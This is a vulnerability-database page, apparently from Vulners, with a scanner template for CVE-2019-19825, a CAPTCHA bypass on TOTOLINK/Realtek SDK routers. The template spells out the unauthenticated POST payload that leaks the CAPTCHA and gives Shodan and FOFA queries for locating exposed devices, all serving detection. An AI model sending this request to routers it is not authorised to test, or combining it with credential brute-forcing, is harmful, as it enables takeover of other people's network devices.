| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| Realtek SDK Information Disclosure / Code Execution Exploit | 27 Jan 202000:00 | – | zdt | |
| CVE-2019-19825 | 27 Jan 202021:37 | – | circl | |
| TOTOLINK Realtek SDK Routers Authentication Bypass (CVE-2019-19825) | 23 Nov 202000:00 | – | checkpoint_advisories | |
| CVE-2019-19825 | 27 Jan 202016:50 | – | cve | |
| CVE-2019-19825 | 27 Jan 202016:50 | – | cvelist | |
| EUVD-2019-9423 | 7 Oct 202500:30 | – | euvd | |
| CVE-2019-19825 | 27 Jan 202017:15 | – | nvd | |
| CVE-2019-19825 | 27 Jan 202017:15 | – | osv | |
| Realtek SDK Information Disclosure / Code Execution | 24 Jan 202000:00 | – | packetstorm | |
| Design/Logic Flaw | 27 Jan 202017:15 | – | prion |
id: CVE-2019-19825
info:
name: TOTOLINK/Realtek Routers - CAPTCHA Bypass
author: ritikchaddha
severity: critical
description: |
On certain TOTOLINK Realtek SDK based routers, the CAPTCHA text can be retrieved via a POST request to the boafrm/formLogin URI with the JSON payload {"topicurl":"setting/getSanvas"}. This allows an unauthenticated attacker to bypass CAPTCHA verification, gaining unauthorized access to restricted functions. Once valid credentials are known or brute-forced, an attacker can fully control the device using HTTP requests and Basic Authentication. Affected router models include A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, N100RE through 3.4.0, and other Realtek SDK-derived devices.
impact: |
Unauthenticated attackers can bypass CAPTCHA verification to brute-force credentials and gain unauthorized administrative access, leading to complete device control and potential network compromise.
remediation: |
Upgrade to firmware versions beyond those listed as vulnerable, or replace affected devices with patched alternatives.
reference:
- http://packetstormsecurity.com/files/156083/Realtek-SDK-Information-Disclosure-Code-Execution.html
- https://nvd.nist.gov/vuln/detail/CVE-2019-19825
classification:
cve-id: CVE-2019-19825
epss-score: 0.29557
epss-percentile: 0.9796
cwe-id: CWE-287
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
metadata:
verified: true
max-requests: 1
vendor: totolink
product: totolink-router
fofa-query: title="totolink"
shodan-query: http.html:"TOTOLINK"
tags: cve,cve2019,totolink,realtek,captcha,bypass,vkev
http:
- raw:
- |
POST /boafrm/formLogin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"topicurl":"setting/getSanvas"}
matchers:
- type: dsl
dsl:
- 'regex("^[A-Za-z0-9]{4}$", body)'
- 'contains(content_type, "text/html")'
- 'content_length == 4'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100a9896b7d86c3c794057e07d703934f6709c2ad4a2dcb8d2ea83d8150c939a5b102205deae0ce633e2e302912e1d54e4f45a2d92356923e602400ad9ac9285ca6d220:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation